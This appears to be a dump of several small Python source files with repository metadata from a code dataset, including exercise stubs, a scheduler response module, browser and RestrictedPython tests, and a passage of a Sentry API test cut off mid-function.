] | 1,890 | 2017-06-18T20:06:10.000Z | 2022-03-31T18:35:51.000Z | exercises/rail-fence-cipher/rail_fence_cipher.py | kishankj/python | 82042de746128127502e109111e6c4e8ab002af6 | [
"MIT"
] | 1,095 | 2017-06-26T23:06:19.000Z | 2022-03-29T03:25:38.000Z | def encode(message, rails):
pass
def decode(encoded_message, rails):
pass
| 12 | 35 | 0.690476 | 11 | 84 | 5.181818 | 0.636364 | 0.421053 | 0.561404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 84 | 6 | 36 | 14 | 0.863636 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
998dc126363b109b7d1a5f04e481dd5f751d2f0a | 74 | py | Python | app/forms.py | leni1/points-accrual | 5f93ab86cc824d7c8e99eb9d87ce2d528f03c075 | [
"BSD-3-Clause"
] | null | null | null | app/forms.py | leni1/points-accrual | 5f93ab86cc824d7c8e99eb9d87ce2d528f03c075 | [
"BSD-3-Clause"
] | null | null | null | app/forms.py | leni1/points-accrual | 5f93ab86cc824d7c8e99eb9d87ce2d528f03c075 | [
"BSD-3-Clause"
] | null | null | null | from django import forms
class ExpenseRequestForm(forms.Form):
pass
| 12.333333 | 37 | 0.77027 | 9 | 74 | 6.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175676 | 74 | 5 | 38 | 14.8 | 0.934426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
511381d36b9c87e015b8ba801a8ccaf99655f3ce | 39 | py | Python | fhir_kindling/serde/__init__.py | migraf/fhir-kindling | 2a3c00ba261a629f58b2408bbff18080ec08b069 | [
"MIT"
] | 3 | 2021-12-19T03:17:54.000Z | 2022-02-24T10:29:25.000Z | fhir_kindling/serde/__init__.py | migraf/fhir-kindling | 2a3c00ba261a629f58b2408bbff18080ec08b069 | [
"MIT"
] | 60 | 2021-10-30T12:12:39.000Z | 2022-03-28T07:24:38.000Z | fhir_kindling/serde/__init__.py | migraf/fhir-kindling | 2a3c00ba261a629f58b2408bbff18080ec08b069 | [
"MIT"
] | 1 | 2022-02-24T11:06:48.000Z | 2022-02-24T11:06:48.000Z | from .csv_parser import flatten_bundle
| 19.5 | 38 | 0.871795 | 6 | 39 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
51366f09604e2ff0a0c804a53075e5200092b1da | 70 | py | Python | tests/expectations/mr-x-mr-explicit-order.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 3 | 2021-01-22T20:42:31.000Z | 2021-06-02T17:53:19.000Z | tests/expectations/mr-x-mr-explicit-order.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 331 | 2017-11-13T22:41:56.000Z | 2021-12-02T21:59:43.000Z | tests/expectations/mr-x-mr-explicit-order.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 1 | 2021-02-19T02:49:00.000Z | 2021-02-19T02:49:00.000Z | [[3, 22, 8, 22], [45, 3, 12, 45], [12, 8, 86, 86], [45, 22, 86, 130]]
| 35 | 69 | 0.414286 | 16 | 70 | 1.8125 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.537037 | 0.228571 | 70 | 1 | 70 | 70 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5a8d304bb0e580cfcad7bb586d37b65a2381fbdf | 7,310 | py | Python | crawler/crawler/treewalk/scheduler/responses.py | amosproj/amos-ss2020-metadata-hub | f8434b27b306332c117a8dd20a8a55a3104d0f89 | [
"MIT"
] | 9 | 2020-04-23T14:22:48.000Z | 2022-02-25T21:35:05.000Z | crawler/crawler/treewalk/scheduler/responses.py | amosproj/amos-ss2020-metadata-hub | f8434b27b306332c117a8dd20a8a55a3104d0f89 | [
"MIT"
] | 42 | 2020-04-24T17:59:33.000Z | 2022-02-16T01:09:23.000Z | crawler/crawler/treewalk/scheduler/responses.py | amosproj/amos-ss2020-metadata-hub | f8434b27b306332c117a8dd20a8a55a3104d0f89 | [
"MIT"
] | 2 | 2020-08-17T11:19:44.000Z | 2021-04-30T08:32:05.000Z | """This module contains the responses coming from the scheduler."""
# Local imports
import crawler.communication as communication
def respond_config_already_present(identifier: str) -> None:
"""Respond that the config is already present in the schedule.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
Args:
identifier (str): identifier of the configuration
"""
response = communication.Response(
success=False,
message=(
f'Configuration with identifier {identifier} '
f'is already present in the schedule, thus it was not added.'
),
command=communication.SCHEDULER_ADD_CONFIG
)
communication.scheduler_queue_output.put(response)
def respond_config_inserted(identifier: str, success: bool) -> None:
"""Respond that the config was inserted in the database.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
The response depends if the insertion succeeded or failed.
Args:
identifier (str): identifier of the configuration
success (bool): insertion succeeded/failed
"""
if success:
response = communication.Response(
success=True,
message=(
f'Configuration with identifier {identifier} '
f'was successfully added to the schedule.'
),
command=communication.SCHEDULER_ADD_CONFIG
)
else:
response = communication.Response(
success=False,
message=(
f'Configuration with identifier {identifier} '
f'wasn\'t added to the schedule due to an internal error.'
),
command=communication.SCHEDULER_ADD_CONFIG
)
communication.scheduler_queue_output.put(response)
def respond_config_deleted(identifier: str, success: bool) -> None:
"""Respond that the config was deleted from the database.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
The response depends if the deletion succeeded or failed.
Args:
identifier (str): identifier of the configuration
success (bool): insertion succeeded/failed
"""
if success:
response = communication.Response(
success=True,
message=(
f'Configuration with identifier {identifier} '
f'was successfully deleted from the schedule.'
),
command=communication.SCHEDULER_REMOVE_CONFIG
)
else:
response = communication.Response(
success=False,
message=(
f'Configuration with identifier {identifier} '
f'wasn\'t deleted from the schedule (not present).'
),
command=communication.SCHEDULER_REMOVE_CONFIG
)
communication.scheduler_queue_output.put(response)
def respond_schedule(schedule: dict) -> None:
"""Respond the TreeWalk schedule.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
The response depends if the insertion succeeded or failed.
Args:
schedule (dict): schedule
"""
if schedule is None:
response = communication.Response(
success=False,
message='Unable to read schedule.',
command=communication.SCHEDULER_GET_SCHEDULE
)
else:
response = communication.Response(
success=True,
message=schedule,
command=communication.SCHEDULER_GET_SCHEDULE
)
communication.scheduler_queue_output.put(response)
def respond_interval_overlaps(identifier: str) -> None:
"""Respond that the interval overlaps with a already existing one.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
Args:
identifier (str): identifier of the interval
"""
response = communication.Response(
success=False,
message=(f'Interval with identifier {identifier} is overlapping.'),
command=communication.SCHEDULER_ADD_INTERVAL
)
communication.scheduler_queue_output.put(response)
def respond_interval_inserted(identifier: str, success: bool) -> None:
"""Respond that the interval was inserted in the database.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
The response depends if the insertion succeeded or failed.
Args:
identifier (str): identifier of the interval
success (bool): insertion succeeded/failed
"""
if success:
response = communication.Response(
success=True,
message=(
f'Interval with identifier {identifier} '
f'was successfully added.'
),
command=communication.SCHEDULER_ADD_INTERVAL
)
else:
response = communication.Response(
success=False,
message=(
f'Interval with identifier {identifier} '
f'wasn\'t added to the database due to an internal error.'
),
command=communication.SCHEDULER_ADD_INTERVAL
)
communication.scheduler_queue_output.put(response)
def respond_interval_deleted(identifier: str, success: bool) -> None:
"""Respond that the interval was deleted from the database.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
The response depends if the insertion succeeded or failed.
Args:
identifier (str): identifier of the interval
success (bool): insertion succeeded/failed
"""
if success:
response = communication.Response(
success=True,
message=(
f'Interval with identifier {identifier} '
f'was successfully deleted from the database.'
),
command=communication.SCHEDULER_REMOVE_INTERVAL
)
else:
response = communication.Response(
success=False,
message=(
f'Interval with identifier {identifier} '
f'wasn\'t deleted from the database because it wasn\' present.'
),
command=communication.SCHEDULER_REMOVE_INTERVAL
)
communication.scheduler_queue_output.put(response)
def respond_intervals(intervals: dict) -> None:
"""Respond the intervals.
This function creates a corresponding response object and inserts it
in the scheduler output queue.
The response depends if the insertion succeeded or failed.
Args:
intervals (dict): intervals
"""
if intervals is None:
response = communication.Response(
success=False,
message='Unable to read intervals.',
command=communication.SCHEDULER_GET_INTERVALS
)
else:
response = communication.Response(
success=True,
message=intervals,
command=communication.SCHEDULER_GET_INTERVALS
)
communication.scheduler_queue_output.put(response)
| 31.921397 | 79 | 0.646512 | 753 | 7,310 | 6.197875 | 0.11421 | 0.103707 | 0.086994 | 0.107992 | 0.911078 | 0.856225 | 0.780801 | 0.752303 | 0.752303 | 0.681594 | 0 | 0 | 0.288646 | 7,310 | 228 | 80 | 32.061404 | 0.8975 | 0.308071 | 0 | 0.690476 | 0 | 0 | 0.146789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063492 | false | 0 | 0.007937 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5ad422ecaa5acdaa32cd265aee26a9d83bb32465 | 2,502 | py | Python | tests/test_async_finder.py | alialdakheel/splinter | b4c48dc0af9ef98d7d9268f42f4d31a51e65fd68 | [
"BSD-3-Clause"
] | null | null | null | tests/test_async_finder.py | alialdakheel/splinter | b4c48dc0af9ef98d7d9268f42f4d31a51e65fd68 | [
"BSD-3-Clause"
] | null | null | null | tests/test_async_finder.py | alialdakheel/splinter | b4c48dc0af9ef98d7d9268f42f4d31a51e65fd68 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from .base import supported_browsers
from .fake_webapp import EXAMPLE_APP
import pytest
@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_css_should_found_an_async_element(get_new_browser, browser_name):
browser = get_new_browser(browser_name)
browser.visit(EXAMPLE_APP)
browser.find_by_css(".add-async-element").click()
elements = browser.find_by_css(".async-element", wait_time=10)
assert 1 == len(elements)
@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_xpath_should_found_an_async_element(get_new_browser, browser_name):
browser = get_new_browser(browser_name)
browser.visit(EXAMPLE_APP)
browser.find_by_css(".add-async-element").click()
elements = browser.find_by_xpath("//h4", wait_time=10)
assert 1 == len(elements)
@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_tag_should_found_an_async_element(get_new_browser, browser_name):
browser = get_new_browser(browser_name)
browser.visit(EXAMPLE_APP)
browser.find_by_css(".add-async-element").click()
elements = browser.find_by_tag("h4", wait_time=10)
assert 1 == len(elements)
@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_id_should_found_an_async_element(get_new_browser, browser_name):
browser = get_new_browser(browser_name)
browser.visit(EXAMPLE_APP)
browser.find_by_css(".add-async-element").click()
elements = browser.find_by_id("async-header", wait_time=10)
assert 1 == len(elements)
@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_name_should_found_an_async_element(get_new_browser, browser_name):
browser = get_new_browser(browser_name)
browser.visit(EXAMPLE_APP)
browser.find_by_css(".add-async-element").click()
elements = browser.find_by_name("async-input", wait_time=10)
assert 1 == len(elements)
@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_value_should_found_an_async_element(get_new_browser, browser_name):
browser = get_new_browser(browser_name)
browser.visit(EXAMPLE_APP)
browser.find_by_css(".add-async-element").click()
elements = browser.find_by_value("async-header-value", wait_time=10)
assert 1 == len(elements)
| 32.493506 | 84 | 0.771783 | 366 | 2,502 | 4.907104 | 0.191257 | 0.110245 | 0.08686 | 0.13363 | 0.834076 | 0.834076 | 0.834076 | 0.818486 | 0.818486 | 0.818486 | 0 | 0.011348 | 0.119504 | 2,502 | 76 | 85 | 32.921053 | 0.803904 | 0.069145 | 0 | 0.666667 | 0 | 0 | 0.103701 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
51f4cdeb23017006192cd46d4b798aee037c8bd8 | 25 | py | Python | chadlib/collection/__init__.py | cjreynol/chadlib | e417a6c5b100b7124a7d9b61d0120b3caa897bb8 | [
"MIT"
] | 1 | 2021-08-06T21:56:52.000Z | 2021-08-06T21:56:52.000Z | chadlib/collection/__init__.py | cjreynol/chadlib | e417a6c5b100b7124a7d9b61d0120b3caa897bb8 | [
"MIT"
] | null | null | null | chadlib/collection/__init__.py | cjreynol/chadlib | e417a6c5b100b7124a7d9b61d0120b3caa897bb8 | [
"MIT"
] | null | null | null | from .stack import Stack
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cfcfebd134e39a6d1f7d24e787d043e219d5b351 | 133 | py | Python | communicode/__init__.py | thomashancock/CommuniCode-old-for-presentation | a21746ba70ead268ff31f03016f4889b765bf4af | [
"MIT"
] | null | null | null | communicode/__init__.py | thomashancock/CommuniCode-old-for-presentation | a21746ba70ead268ff31f03016f4889b765bf4af | [
"MIT"
] | 1 | 2015-08-03T08:56:02.000Z | 2015-08-24T17:25:56.000Z | communicode/__init__.py | FrejaThoresen/CommuniCode | 509f7062238a53ff96d137f5b07111de2c61639d | [
"MIT"
] | null | null | null | import gitlab
from django.conf import settings
git = gitlab.Gitlab(settings.SECRET_GITLAB_HOST, token=settings.SECRET_GITLAB_TOKEN)
| 26.6 | 84 | 0.849624 | 19 | 133 | 5.736842 | 0.526316 | 0.256881 | 0.366972 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082707 | 133 | 4 | 85 | 33.25 | 0.893443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3200d2b5bcd54c5dee257a42a44850c248d1f0dc | 102 | py | Python | chessdotcom/__init__.py | Phalanthus/chess.com | 9d5b722035c502146354a51d6ab7735cdc88ccfa | [
"MIT"
] | 28 | 2020-12-13T23:37:11.000Z | 2022-03-31T02:01:34.000Z | chessdotcom/__init__.py | Phalanthus/chess.com | 9d5b722035c502146354a51d6ab7735cdc88ccfa | [
"MIT"
] | 7 | 2021-03-01T15:24:15.000Z | 2022-02-27T03:38:54.000Z | chessdotcom/__init__.py | Phalanthus/chess.com | 9d5b722035c502146354a51d6ab7735cdc88ccfa | [
"MIT"
] | 2 | 2020-06-25T13:16:18.000Z | 2020-06-25T21:42:50.000Z | from chessdotcom.types import ChessDotComError, ChessDotComResponse
from chessdotcom.client import *
| 25.5 | 67 | 0.862745 | 10 | 102 | 8.8 | 0.7 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098039 | 102 | 3 | 68 | 34 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5c6a52e623a3fc0381f14de5394f9e21d84ede20 | 76 | py | Python | schpf/__init__.py | mag1pie/scHPF | 926f8831b4167ad877572a5e34d1e7d2f729b1c4 | [
"BSD-2-Clause"
] | null | null | null | schpf/__init__.py | mag1pie/scHPF | 926f8831b4167ad877572a5e34d1e7d2f729b1c4 | [
"BSD-2-Clause"
] | null | null | null | schpf/__init__.py | mag1pie/scHPF | 926f8831b4167ad877572a5e34d1e7d2f729b1c4 | [
"BSD-2-Clause"
] | null | null | null | from .scHPF_ import *
from .util import *
from ._version import __version__
| 19 | 33 | 0.776316 | 10 | 76 | 5.3 | 0.5 | 0.377358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 76 | 3 | 34 | 25.333333 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5cb339014726b852be63e5d06b521682896434e3 | 220 | py | Python | src/chemspace/__init__.py | sunoru/VisChemSpace | d30e8e3568ade91a68e6fa299dd67d7fd9166bc4 | [
"MIT"
] | 1 | 2019-01-03T06:09:19.000Z | 2019-01-03T06:09:19.000Z | src/chemspace/__init__.py | sunoru/VisChemSpace | d30e8e3568ade91a68e6fa299dd67d7fd9166bc4 | [
"MIT"
] | null | null | null | src/chemspace/__init__.py | sunoru/VisChemSpace | d30e8e3568ade91a68e6fa299dd67d7fd9166bc4 | [
"MIT"
] | null | null | null | from chemspace.load_data import load_data, load_nmr, load_ir
from chemspace.types import NMRVector, IRVector, SpectrumVector
from chemspace.fingerprints import Fingerprints
from chemspace.graph import ChemicalSpaceGraph
| 44 | 63 | 0.872727 | 28 | 220 | 6.714286 | 0.5 | 0.276596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 220 | 4 | 64 | 55 | 0.94 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7a46224293f69ae5223617bb536ce4e3e195bd31 | 31 | py | Python | bumblebee/bees/weibo/__init__.py | nosoyyo/bumblebee | 60452b03b2cd255ae4582a830b463fe7183e209e | [
"Apache-2.0"
] | null | null | null | bumblebee/bees/weibo/__init__.py | nosoyyo/bumblebee | 60452b03b2cd255ae4582a830b463fe7183e209e | [
"Apache-2.0"
] | null | null | null | bumblebee/bees/weibo/__init__.py | nosoyyo/bumblebee | 60452b03b2cd255ae4582a830b463fe7183e209e | [
"Apache-2.0"
] | null | null | null | from .weibobee import WeiboBee
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7aa3e9a5096c5ddc3c9ace004c03500d96bcecca | 408 | py | Python | tests/transformer/operators/test_comparison_operators.py | rahulbahal7/restricted-python | c39cffe71dfc30630e946977735303d3a65b0383 | [
"ZPL-2.1"
] | 236 | 2015-01-03T17:14:53.000Z | 2022-03-01T15:52:46.000Z | tests/transformer/operators/test_comparison_operators.py | rahulbahal7/restricted-python | c39cffe71dfc30630e946977735303d3a65b0383 | [
"ZPL-2.1"
] | 149 | 2016-10-24T06:56:44.000Z | 2022-02-24T08:09:10.000Z | tests/transformer/operators/test_comparison_operators.py | rahulbahal7/restricted-python | c39cffe71dfc30630e946977735303d3a65b0383 | [
"ZPL-2.1"
] | 30 | 2015-04-03T05:38:13.000Z | 2021-11-10T05:13:38.000Z | from tests.helper import restricted_eval
def test_Eq():
assert restricted_eval('1 == 1') is True
def test_NotEq():
assert restricted_eval('1 != 2') is True
def test_Gt():
assert restricted_eval('2 > 1') is True
def test_Lt():
assert restricted_eval('1 < 2')
def test_GtE():
assert restricted_eval('2 >= 2') is True
def test_LtE():
assert restricted_eval('1 <= 2') is True
| 15.692308 | 44 | 0.659314 | 64 | 408 | 4 | 0.296875 | 0.382813 | 0.46875 | 0.328125 | 0.496094 | 0.21875 | 0.21875 | 0 | 0 | 0 | 0 | 0.037267 | 0.210784 | 408 | 25 | 45 | 16.32 | 0.757764 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0.461538 | 1 | 0.461538 | true | 0 | 0.076923 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7aad8df958d81efe593a9b784e5a22aa229d8e5d | 28 | py | Python | rlib/algorithms/vpg/__init__.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 1 | 2019-09-08T08:33:13.000Z | 2019-09-08T08:33:13.000Z | rlib/algorithms/vpg/__init__.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 26 | 2019-03-15T03:11:21.000Z | 2022-03-11T23:42:46.000Z | rlib/algorithms/vpg/__init__.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | null | null | null | from .agent import VPGAgent
| 14 | 27 | 0.821429 | 4 | 28 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8fbb8025465b4a97be202eba2279336ee52264bd | 133 | py | Python | Dataset/Leetcode/train/104/581.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/104/581.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/104/581.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
def XXX(self, root):
return 0 if not root else max(self.XXX(root.left),self.XXX(root.right))+1
| 26.6 | 82 | 0.661654 | 23 | 133 | 3.826087 | 0.695652 | 0.159091 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018692 | 0.195489 | 133 | 4 | 83 | 33.25 | 0.803738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
8fd1f45836e437c9643d4ba819ed0b645f0c743e | 99 | py | Python | tests/conftest.py | upymake/pypan | a0bc128780d59a1dfccad82b592a4f31f5d35386 | [
"MIT"
] | 3 | 2020-06-23T21:24:20.000Z | 2020-09-03T02:09:31.000Z | tests/conftest.py | upymake/pypan | a0bc128780d59a1dfccad82b592a4f31f5d35386 | [
"MIT"
] | 18 | 2020-04-26T09:55:14.000Z | 2022-01-19T10:05:00.000Z | tests/conftest.py | vyahello/pypan | a0bc128780d59a1dfccad82b592a4f31f5d35386 | [
"MIT"
] | null | null | null | from _pytest.config.argparsing import Parser
from _pytest.fixtures import SubRequest
import pytest
| 24.75 | 44 | 0.868687 | 13 | 99 | 6.461538 | 0.615385 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10101 | 99 | 3 | 45 | 33 | 0.94382 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8fd2db782e2435e85d39fe95558b66e3169ac206 | 2,303 | py | Python | tests/sentry/api/endpoints/test_project_search_details.py | vperron/sentry | 4ea0c8cb120a3165f0e0b185c64213b69ab621ea | [
"BSD-3-Clause"
] | 20 | 2016-10-01T04:29:24.000Z | 2020-10-09T07:23:34.000Z | tests/sentry/api/endpoints/test_project_search_details.py | tobetterman/sentry | fe85d3aee19dcdbfdd27921c4fb04529fc995a79 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/api/endpoints/test_project_search_details.py | tobetterman/sentry | fe85d3aee19dcdbfdd27921c4fb04529fc995a79 | [
"BSD-3-Clause"
] | 7 | 2016-10-27T05:12:45.000Z | 2021-05-01T14:29:53.000Z | from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.models import SavedSearch
from sentry.testutils import APITestCase
class ProjectSearchDetailsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project(name='foo')
